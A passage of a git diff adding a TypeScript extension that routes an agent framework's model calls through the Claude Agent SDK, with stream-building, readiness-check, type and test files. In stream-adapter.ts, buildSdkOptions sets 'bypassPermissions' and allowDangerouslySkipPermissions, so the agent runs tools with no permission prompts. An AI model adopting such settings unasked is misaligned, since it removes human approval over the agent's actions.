+			sdkUsage.cache_read_input_tokens +
+			sdkUsage.cache_creation_input_tokens,
+		cost: {
+			input: 0,
+			output: 0,
+			cacheRead: 0,
+			cacheWrite: 0,
+			total: totalCostUsd,
+		},
+	};
+}
+
+// ---------------------------------------------------------------------------
+// Zero-cost usage constant
+// ---------------------------------------------------------------------------
+
+export const ZERO_USAGE: Usage = {
+	input: 0,
+	output: 0,
+	cacheRead: 0,
+	cacheWrite: 0,
+	totalTokens: 0,
+	cost: { input: 0, output: 0, cacheRead: 0, cacheWrite: 0, total: 0 },
+};
+
+// ---------------------------------------------------------------------------
+// Streaming partial-message state tracker
+// ---------------------------------------------------------------------------
+
+/**
+ * Mutable accumulator that tracks the partial AssistantMessage being built
+ * from a sequence of stream_event messages. Produces AssistantMessageEvent
+ * deltas that the TUI can render incrementally.
+ */
+export class PartialMessageBuilder {
+	private partial: AssistantMessage;
+	/** Map from stream-event `index` to our content array index. */
+	private indexMap = new Map<number, number>();
+	/** Accumulated JSON input string per tool_use block (keyed by stream index). */
+	private toolJsonAccum = new Map<number, string>();
+
+	constructor(model: string) {
+		this.partial = {
+			role: "assistant",
+			content: [],
+			api: "anthropic-messages",
+			provider: "claude-code",
+			model,
+			usage: { ...ZERO_USAGE },
+			stopReason: "stop",
+			timestamp: Date.now(),
+		};
+	}
+
+	get message(): AssistantMessage {
+		return this.partial;
+	}
+
+	/**
+	 * Feed a BetaRawMessageStreamEvent and return the corresponding
+	 * AssistantMessageEvent (or null if the event is not mapped).
+	 */
+	handleEvent(event: BetaRawMessageStreamEvent): AssistantMessageEvent | null {
+		const streamIndex = event.index ?? 0;
+
+		switch (event.type) {
+			// ---- Block start ----
+			case "content_block_start": {
+				const block = event.content_block;
+				if (!block) return null;
+
+				const contentIndex = this.partial.content.length;
+				this.indexMap.set(streamIndex, contentIndex);
+
+				if (block.type === "text") {
+					this.partial.content.push({ type: "text", text: "" });
+					return { type: "text_start", contentIndex, partial: this.partial };
+				}
+				if (block.type === "thinking") {
+					this.partial.content.push({ type: "thinking", thinking: "" });
+					return { type: "thinking_start", contentIndex, partial: this.partial };
+				}
+				if (block.type === "tool_use") {
+					this.toolJsonAccum.set(streamIndex, "");
+					this.partial.content.push({
+						type: "toolCall",
+						id: block.id,
+						name: block.name,
+						arguments: {},
+					});
+					return { type: "toolcall_start", contentIndex, partial: this.partial };
+				}
+				if (block.type === "server_tool_use") {
+					this.partial.content.push({
+						type: "serverToolUse",
+						id: block.id,
+						name: block.name,
+						input: block.input,
+					});
+					return { type: "server_tool_use", contentIndex, partial: this.partial };
+				}
+				return null;
+			}
+
+			// ---- Block delta ----
+			case "content_block_delta": {
+				const contentIndex = this.indexMap.get(streamIndex);
+				if (contentIndex === undefined) return null;
+				const delta = event.delta;
+				if (!delta) return null;
+
+				if (delta.type === "text_delta" && typeof delta.text === "string") {
+					const existing = this.partial.content[contentIndex] as TextContent;
+					existing.text += delta.text;
+					return { type: "text_delta", contentIndex, delta: delta.text, partial: this.partial };
+				}
+				if (delta.type === "thinking_delta" && typeof delta.thinking === "string") {
+					const existing = this.partial.content[contentIndex] as ThinkingContent;
+					existing.thinking += delta.thinking;
+					return { type: "thinking_delta", contentIndex, delta: delta.thinking, partial: this.partial };
+				}
+				if (delta.type === "input_json_delta" && typeof delta.partial_json === "string") {
+					const accum = (this.toolJsonAccum.get(streamIndex) ?? "") + delta.partial_json;
+					this.toolJsonAccum.set(streamIndex, accum);
+					return { type: "toolcall_delta", contentIndex, delta: delta.partial_json, partial: this.partial };
+				}
+				return null;
+			}
+
+			// ---- Block stop ----
+			case "content_block_stop": {
+				const contentIndex = this.indexMap.get(streamIndex);
+				if (contentIndex === undefined) return null;
+				const block = this.partial.content[contentIndex];
+
+				if (block.type === "text") {
+					return { type: "text_end", contentIndex, content: block.text, partial: this.partial };
+				}
+				if (block.type === "thinking") {
+					return { type: "thinking_end", contentIndex, content: block.thinking, partial: this.partial };
+				}
+				if (block.type === "toolCall") {
+					const jsonStr = this.toolJsonAccum.get(streamIndex) ?? "{}";
+					const jsonForParse = hasXmlParameterTags(jsonStr) ? repairToolJson(jsonStr) : jsonStr;
+					try {
+						block.arguments = JSON.parse(jsonForParse);
+					} catch {
+						// JSON.parse failed — attempt repair for YAML-style bullet
+						// lists that LLMs copy from template formatting (#2660).
+						try {
+							block.arguments = JSON.parse(repairToolJson(jsonForParse));
+						} catch {
+							// Repair also failed — stream was truncated or garbage.
+							// Preserve the raw string for diagnostics but signal the
+							// malformation explicitly so downstream consumers can
+							// distinguish this from a healthy tool completion (#2574).
+							block.arguments = { _raw: jsonStr };
+							return { type: "toolcall_end", contentIndex, toolCall: block, partial: this.partial, malformedArguments: true };
+						}
+					}
+					return { type: "toolcall_end", contentIndex, toolCall: block, partial: this.partial };
+				}
+				return null;
+			}
+
+			default:
+				return null;
+		}
+	}
+}
diff --git a/src/resources/extensions/claude-code-cli/readiness.ts b/src/resources/extensions/claude-code-cli/readiness.ts
new file mode 100644
index 000000000..48f3cca28
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/readiness.ts
@@ -0,0 +1,85 @@
+/**
+ * Readiness check for the Claude Code CLI provider.
+ *
+ * Verifies the `claude` binary is installed, responsive, AND authenticated.
+ * Results are cached for 30 seconds to avoid shelling out on every
+ * model-availability check.
+ *
+ * Auth verification follows the T3 Code pattern: run `claude auth status`
+ * and check the exit code + output for an authenticated session.
+ */
+
+import { execFileSync } from "node:child_process";
+
+let cachedBinaryPresent: boolean | null = null;
+let cachedAuthed: boolean | null = null;
+let lastCheckMs = 0;
+const CHECK_INTERVAL_MS = 30_000;
+
+function refreshCache(): void {
+	const now = Date.now();
+	if (cachedBinaryPresent !== null && now - lastCheckMs < CHECK_INTERVAL_MS) {
+		return;
+	}
+
+	// Set timestamp first to prevent re-entrant checks during the same window
+	lastCheckMs = now;
+
+	// Check binary presence
+	try {
+		execFileSync("claude", ["--version"], { timeout: 5_000, stdio: "pipe" });
+		cachedBinaryPresent = true;
+	} catch {
+		cachedBinaryPresent = false;
+		cachedAuthed = false;
+		return;
+	}
+
+	// Check auth status — exit code 0 with non-error output means authenticated
+	try {
+		const output = execFileSync("claude", ["auth", "status"], { timeout: 5_000, stdio: "pipe" })
+			.toString()
+			.toLowerCase();
+		// The CLI outputs "not logged in", "no credentials", or similar when unauthenticated
+		cachedAuthed = !(/not logged in|no credentials|unauthenticated|not authenticated/i.test(output));
+	} catch {
+		// Non-zero exit code means not authenticated
+		cachedAuthed = false;
+	}
+}
+
+/**
+ * Whether the `claude` binary is installed (regardless of auth state).
+ */
+export function isClaudeBinaryPresent(): boolean {
+	refreshCache();
+	return cachedBinaryPresent ?? false;
+}
+
+/**
+ * Whether the `claude` CLI is authenticated with a valid session.
+ * Returns false if the binary is not installed.
+ */
+export function isClaudeCodeAuthed(): boolean {
+	refreshCache();
+	return (cachedBinaryPresent ?? false) && (cachedAuthed ?? false);
+}
+
+/**
+ * Full readiness check: binary installed AND authenticated.
+ * This is the gating function used by the provider registration.
+ */
+export function isClaudeCodeReady(): boolean {
+	refreshCache();
+	return (cachedBinaryPresent ?? false) && (cachedAuthed ?? false);
+}
+
+/**
+ * Force-clear the cached readiness state.
+ * Useful after the user completes auth setup so the next check is fresh.
+ */
+export function clearReadinessCache(): void {
+	cachedBinaryPresent = null;
+	cachedAuthed = null;
+	lastCheckMs = 0;
+}
diff --git a/src/resources/extensions/claude-code-cli/sdk-types.ts b/src/resources/extensions/claude-code-cli/sdk-types.ts
new file mode 100644
index 000000000..040175cdc
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/sdk-types.ts
@@ -0,0 +1,149 @@
+/**
+ * Lightweight type mirrors for the Claude Agent SDK.
+ *
+ * These stubs allow the extension to compile without a hard dependency on
+ * `@anthropic-ai/claude-agent-sdk`. The real SDK is imported dynamically
+ * at runtime in stream-adapter.ts.
+ */
+
+/** UUID branded string from the SDK. */
+export type UUID = string;
+
+/** BetaMessage from the Anthropic SDK, as wrapped by SDKAssistantMessage. */
+export interface BetaMessage {
+	id: string;
+	type: "message";
+	role: "assistant";
+	content: BetaContentBlock[];
+	model: string;
+	stop_reason: "end_turn" | "max_tokens" | "stop_sequence" | "tool_use" | null;
+	usage: { input_tokens: number; output_tokens: number };
+}
+
+export type BetaContentBlock =
+	| { type: "text"; text: string }
+	| { type: "thinking"; thinking: string; signature?: string }
+	| { type: "tool_use"; id: string; name: string; input: Record<string, unknown> }
+	| { type: "server_tool_use"; id: string; name: string; input: unknown }
+	| { type: "web_search_tool_result"; tool_use_id: string; content: unknown };
+
+/** Streaming event emitted when includePartialMessages is true. */
+export interface BetaRawMessageStreamEvent {
+	type: string;
+	index?: number;
+	content_block?: BetaContentBlock;
+	delta?: Record<string, unknown>;
+}
+
+export interface SDKAssistantMessage {
+	type: "assistant";
+	uuid: UUID;
+	session_id: string;
+	message: BetaMessage;
+	parent_tool_use_id: string | null;
+	error?: { type: string; message: string };
+}
+
+export interface SDKUserMessage {
+	type: "user";
+	uuid?: UUID;
+	session_id: string;
+	message: unknown;
+	parent_tool_use_id: string | null;
+	isSynthetic?: boolean;
+	tool_use_result?: unknown;
+}
+
+export interface SDKSystemMessage {
+	type: "system";
+	subtype: "init";
+	[key: string]: unknown;
+}
+
+export interface SDKStatusMessage {
+	type: "system";
+	subtype: "status";
+	status: "compacting" | null;
+	uuid: UUID;
+	session_id: string;
+}
+
+export interface SDKPartialAssistantMessage {
+	type: "stream_event";
+	event: BetaRawMessageStreamEvent;
+	parent_tool_use_id: string | null;
+	uuid: UUID;
+	session_id: string;
+}
+
+export interface SDKToolProgressMessage {
+	type: "tool_progress";
+	tool_use_id: string;
+	tool_name: string;
+	parent_tool_use_id: string | null;
+	elapsed_time_seconds: number;
+	task_id?: string;
+	uuid: UUID;
+	session_id: string;
+}
+
+export interface NonNullableUsage {
+	input_tokens: number;
+	output_tokens: number;
+	cache_read_input_tokens: number;
+	cache_creation_input_tokens: number;
+}
+
+export type SDKResultMessage =
+	| {
+			type: "result";
+			subtype: "success";
+			uuid: UUID;
+			session_id: string;
+			duration_ms: number;
+			duration_api_ms: number;
+			is_error: boolean;
+			num_turns: number;
+			result: string;
+			stop_reason: string | null;
+			total_cost_usd: number;
+			usage: NonNullableUsage;
+	  }
+	| {
+			type: "result";
+			subtype:
+				| "error_max_turns"
+				| "error_during_execution"
+				| "error_max_budget_usd"
+				| "error_max_structured_output_retries";
+			uuid: UUID;
+			session_id: string;
+			duration_ms: number;
+			duration_api_ms: number;
+			is_error: boolean;
+			num_turns: number;
+			stop_reason: string | null;
+			total_cost_usd: number;
+			usage: NonNullableUsage;
+			errors: string[];
+	  };
+
+/** Catch-all for SDK message types we don't map. */
+export interface SDKOtherMessage {
+	type: string;
+	[key: string]: unknown;
+}
+
+/**
+ * Union of all SDK message types this extension handles.
+ * Mirrors the real `SDKMessage` from `@anthropic-ai/claude-agent-sdk`.
+ */
+export type SDKMessage =
+	| SDKAssistantMessage
+	| SDKUserMessage
+	| SDKResultMessage
+	| SDKSystemMessage
+	| SDKStatusMessage
+	| SDKPartialAssistantMessage
+	| SDKToolProgressMessage
+	| SDKOtherMessage;
diff --git a/src/resources/extensions/claude-code-cli/stream-adapter.ts b/src/resources/extensions/claude-code-cli/stream-adapter.ts
new file mode 100644
index 000000000..7995cdcdc
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/stream-adapter.ts
@@ -0,0 +1,455 @@
+/**
+ * Stream adapter: bridges the Claude Agent SDK into GSD's streamSimple contract.
+ *
+ * The SDK runs the full agentic loop (multi-turn, tool execution, compaction)
+ * in one call. This adapter translates the SDK's streaming output into
+ * AssistantMessageEvents for TUI rendering, then strips tool-call blocks from
+ * the final AssistantMessage so GSD's agent loop doesn't try to dispatch them.
+ */
+
+import type {
+	AssistantMessage,
+	AssistantMessageEvent,
+	AssistantMessageEventStream,
+	Context,
+	Model,
+	SimpleStreamOptions,
+} from "@gsd/pi-ai";
+import { EventStream } from "@gsd/pi-ai";
+import { execSync } from "node:child_process";
+import { PartialMessageBuilder, ZERO_USAGE, mapUsage } from "./partial-builder.js";
+import type {
+	SDKAssistantMessage,
+	SDKMessage,
+	SDKPartialAssistantMessage,
+	SDKResultMessage,
+} from "./sdk-types.js";
+
+// ---------------------------------------------------------------------------
+// Stream factory
+// ---------------------------------------------------------------------------
+
+/**
+ * Construct an AssistantMessageEventStream using EventStream directly.
+ * (The class itself is only re-exported as a type from the @gsd/pi-ai barrel.)
+ */
+function createAssistantStream(): AssistantMessageEventStream {
+	return new EventStream<AssistantMessageEvent, AssistantMessage>(
+		(event) => event.type === "done" || event.type === "error",
+		(event) => {
+			if (event.type === "done") return event.message;
+			if (event.type === "error") return event.error;
+			throw new Error("Unexpected event type for final result");
+		},
+	) as AssistantMessageEventStream;
+}
+
+// ---------------------------------------------------------------------------
+// Claude binary resolution
+// ---------------------------------------------------------------------------
+
+let cachedClaudePath: string | null = null;
+
+export function getClaudeLookupCommand(platform: NodeJS.Platform = process.platform): string {
+	return platform === "win32" ? "where claude" : "which claude";
+}
+
+export function parseClaudeLookupOutput(output: Buffer | string): string {
+	return output
+		.toString()
+		.trim()
+		.split(/\r?\n/)[0] ?? "";
+}
+
+/**
+ * Resolve the path to the system-installed `claude` binary.
+ * The SDK defaults to a bundled cli.js which doesn't exist when
+ * installed as a library — we need to point it at the real CLI.
+ */
+function getClaudePath(): string {
+	if (cachedClaudePath) return cachedClaudePath;
+	try {
+		cachedClaudePath = parseClaudeLookupOutput(execSync(getClaudeLookupCommand(), { timeout: 5_000, stdio: "pipe" }));
+	} catch {
+		cachedClaudePath = "claude"; // fall back to PATH resolution
+	}
+	return cachedClaudePath;
+}
+
+// ---------------------------------------------------------------------------
+// Prompt construction
+// ---------------------------------------------------------------------------
+
+/**
+ * Extract text content from a single message regardless of content shape.
+ */
+function extractMessageText(msg: { role: string; content: unknown }): string {
+	if (typeof msg.content === "string") return msg.content;
+	if (Array.isArray(msg.content)) {
+		const textParts = msg.content
+			.filter((part: any) => part.type === "text")
+			.map((part: any) => part.text ?? part.thinking ?? "");
+		if (textParts.length > 0) return textParts.join("\n");
+	}
+	return "";
+}
+
+/**
+ * Build a full conversational prompt from GSD's context messages.
+ *
+ * Previous behaviour sent only the last user message, making every SDK
+ * call effectively stateless. This version serialises the complete
+ * conversation history (system prompt + all user/assistant turns) so
+ * Claude Code has full context for multi-turn continuity.
+ */
+export function buildPromptFromContext(context: Context): string {
+	const parts: string[] = [];
+
+	if (context.systemPrompt) {
+		parts.push(`[System]\n${context.systemPrompt}`);
+	}
+
+	for (const msg of context.messages) {
+		const text = extractMessageText(msg);
+		if (!text) continue;
+
+		const label = msg.role === "user" ? "User" : msg.role === "assistant" ? "Assistant" : "System";
+		parts.push(`[${label}]\n${text}`);
+	}
+
+	return parts.join("\n\n");
+}
+
+// ---------------------------------------------------------------------------
+// Error helper
+// ---------------------------------------------------------------------------
+
+function makeErrorMessage(model: string, errorMsg: string): AssistantMessage {
+	return {
+		role: "assistant",
+		content: [{ type: "text", text: `Claude Code error: ${errorMsg}` }],
+		api: "anthropic-messages",
+		provider: "claude-code",
+		model,
+		usage: { ...ZERO_USAGE },
+		stopReason: "error",
+		errorMessage: errorMsg,
+		timestamp: Date.now(),
+	};
+}
+
+/**
+ * Generator exhaustion without a terminal result means the SDK stream was
+ * interrupted mid-turn. Surface it as an error so downstream recovery logic
+ * can classify and retry it instead of treating it as a clean completion.
+ */
+export function makeStreamExhaustedErrorMessage(model: string, lastTextContent: string): AssistantMessage {
+	const errorMsg = "stream_exhausted_without_result";
+	const message = makeErrorMessage(model, errorMsg);
+	if (lastTextContent) {
+		message.content = [{ type: "text", text: lastTextContent }];
+	}
+	return message;
+}
+
+/**
+ * Claude Code executes its own internal tool loop inside the SDK call. The
+ * streamed and final assistant messages should therefore contain only
+ * user-facing content (text/thinking), not replayable tool blocks that GSD
+ * would render again.
+ */
+function isUserFacingClaudeCodeBlock(block: AssistantMessage["content"][number]): boolean {
+	return block.type === "text" || block.type === "thinking";
+}
+
+function filterUserFacingClaudeCodeContent(
+	blocks: AssistantMessage["content"],
+): AssistantMessage["content"] {
+	return blocks.filter(isUserFacingClaudeCodeBlock);
+}
+
+function remapClaudeCodeContentIndex(
+	blocks: AssistantMessage["content"],
+	contentIndex: number,
+): number {
+	let visibleCount = 0;
+	for (let i = 0; i <= contentIndex && i < blocks.length; i++) {
+		if (isUserFacingClaudeCodeBlock(blocks[i]!)) visibleCount++;
+	}
+	return Math.max(0, visibleCount - 1);
+}
+
+function sanitizeClaudeCodePartial(
+	partial: AssistantMessage,
+): AssistantMessage {
+	return {
+		...partial,
+		content: filterUserFacingClaudeCodeContent(partial.content),
+	};
+}
+
+export function sanitizeClaudeCodeStreamingEvent(
+	event: AssistantMessageEvent,
+): AssistantMessageEvent | null {
+	switch (event.type) {
+		case "toolcall_start":
+		case "toolcall_delta":
+		case "toolcall_end":
+		case "server_tool_use":
+		case "web_search_result":
+			return null;
+		case "text_start":
+		case "text_delta":
+		case "text_end":
+		case "thinking_start":
+		case "thinking_delta":
+		case "thinking_end":
+			return {
+				...event,
+				contentIndex: remapClaudeCodeContentIndex(event.partial.content, event.contentIndex),
+				partial: sanitizeClaudeCodePartial(event.partial),
+			};
+		default:
+			return event;
+	}
+}
+
+export function buildFinalClaudeCodeContent(
+	blocks: AssistantMessage["content"],
+	lastThinkingContent: string,
+	lastTextContent: string,
+	resultText?: string,
+): AssistantMessage["content"] {
+	const finalContent = filterUserFacingClaudeCodeContent(blocks);
+	if (finalContent.length > 0) return finalContent;
+
+	if (lastThinkingContent) {
+		finalContent.push({ type: "thinking", thinking: lastThinkingContent });
+	}
+	if (lastTextContent) {
+		finalContent.push({ type: "text", text: lastTextContent });
+	}
+	if (finalContent.length === 0 && resultText) {
+		finalContent.push({ type: "text", text: resultText });
+	}
+	return finalContent;
+}
+
+// ---------------------------------------------------------------------------
+// SDK options builder
+// ---------------------------------------------------------------------------
+
+/**
+ * Build the options object passed to the Claude Agent SDK's `query()` call.
+ *
+ * Extracted for testability — callers can verify session persistence,
+ * beta flags, and other configuration without mocking the full SDK.
+ */
+export function buildSdkOptions(modelId: string, prompt: string): Record<string, unknown> {
+	return {
+		pathToClaudeCodeExecutable: getClaudePath(),
+		model: modelId,
+		includePartialMessages: true,
+		persistSession: true,
+		cwd: process.cwd(),
+		permissionMode: "bypassPermissions",
+		allowDangerouslySkipPermissions: true,
+		settingSources: ["project"],
+		systemPrompt: { type: "preset", preset: "claude_code" },
+		betas: modelId.includes("sonnet") ? ["context-1m-2025-08-07"] : [],
+	};
+}
+
+// ---------------------------------------------------------------------------
+// streamSimple implementation
+// ---------------------------------------------------------------------------
+
+/**
+ * GSD streamSimple function that delegates to the Claude Agent SDK.
+ *
+ * Emits AssistantMessageEvent deltas for real-time TUI rendering
+ * (thinking, text, tool calls). The final AssistantMessage has tool-call
+ * blocks stripped so the agent loop ends the turn without local dispatch.
+ */
+export function streamViaClaudeCode(
+	model: Model<any>,
+	context: Context,
+	options?: SimpleStreamOptions,
+): AssistantMessageEventStream {
+	const stream = createAssistantStream();
+
+	void pumpSdkMessages(model, context, options, stream);
+
+	return stream;
+}
+
+async function pumpSdkMessages(
+	model: Model<any>,
+	context: Context,
+	options: SimpleStreamOptions | undefined,
+	stream: AssistantMessageEventStream,
+): Promise<void> {
+	const modelId = model.id;
+	let builder: PartialMessageBuilder | null = null;
+	/** Track the last text content seen across all assistant turns for the final message. */
+	let lastTextContent = "";
+	let lastThinkingContent = "";
+
+	try {
+		// Dynamic import — the SDK is an optional dependency.
+		const sdkModule = "@anthropic-ai/claude-agent-sdk";
+		const sdk = (await import(/* webpackIgnore: true */ sdkModule)) as {
+			query: (args: {
+				prompt: string | AsyncIterable<unknown>;
+				options?: Record<string, unknown>;
+			}) => AsyncIterable<SDKMessage>;
+		};
+
+		// Bridge GSD's AbortSignal to SDK's AbortController
+		const controller = new AbortController();
+		if (options?.signal) {
+			options.signal.addEventListener("abort", () => controller.abort(), { once: true });
+		}
+
+		const prompt = buildPromptFromContext(context);
+		const sdkOpts = buildSdkOptions(modelId, prompt);
+
+		const queryResult = sdk.query({
+			prompt,
+			options: {
+				...sdkOpts,
+				abortController: controller,
+			},
+		});
+
+		// Emit start with an empty partial
+		const initialPartial: AssistantMessage = {
+			role: "assistant",
+			content: [],
+			api: "anthropic-messages",
+			provider: "claude-code",
+			model: modelId,
+			usage: { ...ZERO_USAGE },
+			stopReason: "stop",
+			timestamp: Date.now(),
+		};
+		stream.push({ type: "start", partial: initialPartial });
+
+		for await (const msg of queryResult as AsyncIterable<SDKMessage>) {
+			if (options?.signal?.aborted) break;
+
+			switch (msg.type) {
+				// -- Init --
+				case "system": {
+					// Nothing to emit — the stream is already started.
+					break;
+				}
+
+				// -- Streaming partial messages --
+				case "stream_event": {
+					const partial = msg as SDKPartialAssistantMessage;
+
+					const event = partial.event;
+
+					// New assistant turn starts with message_start
+					if (event.type === "message_start") {
+						builder = new PartialMessageBuilder(
+							(event as any).message?.model ?? modelId,
+						);
+						break;
+					}
+
+					if (!builder) break;
+
+					const assistantEvent = builder.handleEvent(event);
+					const sanitizedEvent = assistantEvent
+						? sanitizeClaudeCodeStreamingEvent(assistantEvent)
+						: null;
+					if (sanitizedEvent) stream.push(sanitizedEvent);
+					break;
+				}
+
+				// -- Complete assistant message (non-streaming fallback) --
+				case "assistant": {
+					const sdkAssistant = msg as SDKAssistantMessage;
+
+					// Capture text content from complete messages
+					for (const block of sdkAssistant.message.content) {
+						if (block.type === "text") {
+							lastTextContent = block.text;
+						} else if (block.type === "thinking") {
+							lastThinkingContent = block.thinking;
+						}
+					}
+					break;
+				}
+
+				// -- User message (synthetic tool result — signals turn boundary) --
+				case "user": {
+					// Capture content from the completed turn before resetting
+					if (builder) {
+						for (const block of builder.message.content) {
+							if (block.type === "text" && block.text) {
+								lastTextContent = block.text;
+							} else if (block.type === "thinking" && block.thinking) {
+								lastThinkingContent = block.thinking;
+							}
+						}
+					}
+					builder = null;
+					break;
+				}
+
+				// -- Result (terminal) --
+				case "result": {
+					const result = msg as SDKResultMessage;
+					const finalContent = buildFinalClaudeCodeContent(
+						builder?.message.content ?? [],
+						lastThinkingContent,
+						lastTextContent,
+						result.subtype === "success" ? result.result : undefined,
+					);
+
+					const finalMessage: AssistantMessage = {
+						role: "assistant",
+						content: finalContent,
+						api: "anthropic-messages",
+						provider: "claude-code",
+						model: modelId,
+						usage: mapUsage(result.usage, result.total_cost_usd),
+						stopReason: result.is_error ? "error" : "stop",
+						timestamp: Date.now(),
+					};
+
+					if (result.is_error) {
+						const errText =
+							"errors" in result
+								? (result as any).errors?.join("; ")
+								: result.subtype;
+						finalMessage.errorMessage = errText;
+						stream.push({ type: "error", reason: "error", error: finalMessage });
+					} else {
+						stream.push({ type: "done", reason: "stop", message: finalMessage });
+					}
+					return;
+				}
+
+				default:
+					break;
+			}
+		}
+
+		// Generator exhaustion without a terminal result is a stream interruption,
+		// not a successful completion. Emitting an error lets GSD classify it as a
+		// transient provider failure instead of advancing auto-mode state.
+		const fallback = makeStreamExhaustedErrorMessage(modelId, lastTextContent);
+		stream.push({ type: "error", reason: "error", error: fallback });
+	} catch (err) {
+		const errorMsg = err instanceof Error ? err.message : String(err);
+		stream.push({
+			type: "error",
+			reason: "error",
+			error: makeErrorMessage(modelId, errorMsg),
+		});
+	}
+}
diff --git a/src/resources/extensions/claude-code-cli/tests/partial-builder.test.ts b/src/resources/extensions/claude-code-cli/tests/partial-builder.test.ts
new file mode 100644
index 000000000..01c853a14
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/tests/partial-builder.test.ts
@@ -0,0 +1,150 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { PartialMessageBuilder } from "../partial-builder.ts";
+import type { BetaRawMessageStreamEvent } from "../sdk-types.ts";
+
+describe("PartialMessageBuilder — malformed tool arguments (#2574)", () => {
+	/**
+	 * Helper: feed a tool_use block through the builder lifecycle and return
+	 * the toolcall_end event. Simulates: content_block_start → N deltas → content_block_stop.
+	 */
+	function feedToolCall(
+		builder: PartialMessageBuilder,
+		jsonFragments: string[],
+	) {
+		// Start the tool_use block at stream index 0
+		builder.handleEvent({
+			type: "content_block_start",
+			index: 0,
+			content_block: { type: "tool_use", id: "tool_1", name: "gsd_plan_slice", input: {} },
+		} as BetaRawMessageStreamEvent);
+
+		// Feed JSON fragments as input_json_delta
+		for (const fragment of jsonFragments) {
+			builder.handleEvent({
+				type: "content_block_delta",
+				index: 0,
+				delta: { type: "input_json_delta", partial_json: fragment },
+			} as BetaRawMessageStreamEvent);
+		}
+
+		// Stop the block — this is where JSON parse happens
+		return builder.handleEvent({
+			type: "content_block_stop",
+			index: 0,
+		} as BetaRawMessageStreamEvent);
+	}
+
+	test("valid JSON → toolcall_end without malformedArguments", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		const event = feedToolCall(builder, ['{"milestone', 'Id": "M001"}']);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		// Valid JSON should NOT have the malformedArguments flag
+		assert.equal(
+			(event as any).malformedArguments,
+			undefined,
+			"valid JSON should not set malformedArguments",
+		);
+		// Arguments should be parsed correctly
+		if (event!.type === "toolcall_end") {
+			assert.deepEqual(event!.toolCall.arguments, { milestoneId: "M001" });
+		}
+	});
+
+	test("truncated JSON → toolcall_end WITH malformedArguments: true", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		// Simulate a stream truncation: JSON is cut off mid-value
+		const event = feedToolCall(builder, ['{"milestone', 'Id": "M00']);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		assert.equal(
+			(event as any).malformedArguments,
+			true,
+			"truncated JSON should set malformedArguments: true",
+		);
+		// The _raw field should contain the original broken JSON
+		if (event!.type === "toolcall_end") {
+			assert.equal(
+				event!.toolCall.arguments._raw,
+				'{"milestoneId": "M00',
+				"_raw should contain the truncated JSON string",
+			);
+		}
+	});
+
+	test("no JSON deltas → malformedArguments: true (empty accumulator is not valid JSON)", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		// No deltas — the accumulator is initialized to "" by content_block_start,
+		// and "" is not valid JSON, so this correctly signals malformed.
+		const event = feedToolCall(builder, []);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		assert.equal(
+			(event as any).malformedArguments,
+			true,
+			"empty accumulator (no JSON deltas) is not valid JSON → malformed",
+		);
+	});
+
+	test("garbage input (non-JSON) → malformedArguments: true", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		const event = feedToolCall(builder, ["not json at all <html>"]);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		assert.equal(
+			(event as any).malformedArguments,
+			true,
+			"non-JSON content should set malformedArguments: true",
+		);
+	});
+
+	test("YAML bullet lists repaired to JSON arrays (#2660)", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		const malformedJson =
+			'{"milestoneId": "M005", "keyDecisions": - Used Web Notification API, "keyFiles": - src/lib.rs, "title": "done"}';
+		const event = feedToolCall(builder, [malformedJson]);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		// Repaired YAML bullets should NOT set malformedArguments
+		assert.equal(
+			(event as any).malformedArguments,
+			undefined,
+			"repaired YAML bullets should not set malformedArguments",
+		);
+		if (event!.type === "toolcall_end") {
+			assert.equal(event!.toolCall.arguments.milestoneId, "M005");
+			assert.ok(
+				Array.isArray(event!.toolCall.arguments.keyDecisions),
+				"keyDecisions should be repaired to an array",
+			);
+			assert.ok(
+				Array.isArray(event!.toolCall.arguments.keyFiles),
+				"keyFiles should be repaired to an array",
+			);
+			assert.equal(event!.toolCall.arguments.title, "done");
+		}
+	});
+
+	test("XML parameter tags trapped inside valid JSON strings are promoted (#3751)", () => {
+		const builder = new PartialMessageBuilder("claude-sonnet-4-20250514");
+		const malformedJson =
+			'{"narrative":"text.</narrative>\\n<parameter name=\\"verification\\">all tests pass</parameter>\\n<parameter name=\\"verificationEvidence\\">[\\"npm test\\"]</parameter>","oneLiner":"done"}';
+		const event = feedToolCall(builder, [malformedJson]);
+
+		assert.ok(event, "event should not be null");
+		assert.equal(event!.type, "toolcall_end");
+		assert.equal((event as any).malformedArguments, undefined);
+		if (event!.type === "toolcall_end") {
+			assert.equal(event.toolCall.arguments.narrative, "text.");
+			assert.equal(event.toolCall.arguments.verification, "all tests pass");
+			assert.deepEqual(event.toolCall.arguments.verificationEvidence, ["npm test"]);
+			assert.equal(event.toolCall.arguments.oneLiner, "done");
+		}
+	});
+});
diff --git a/src/resources/extensions/claude-code-cli/tests/stream-adapter.test.ts b/src/resources/extensions/claude-code-cli/tests/stream-adapter.test.ts
new file mode 100644
index 000000000..118832d1a
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/tests/stream-adapter.test.ts
@@ -0,0 +1,234 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import {
+	buildPromptFromContext,
+	buildFinalClaudeCodeContent,
+	buildSdkOptions,
+	getClaudeLookupCommand,
+	makeStreamExhaustedErrorMessage,
+	parseClaudeLookupOutput,
+	sanitizeClaudeCodeStreamingEvent,
+} from "../stream-adapter.ts";
+import type { AssistantMessage, Context, Message } from "@gsd/pi-ai";
+
+// ---------------------------------------------------------------------------
+// Existing tests — exhausted stream fallback (#2575)
+// ---------------------------------------------------------------------------
+
+describe("stream-adapter — exhausted stream fallback (#2575)", () => {
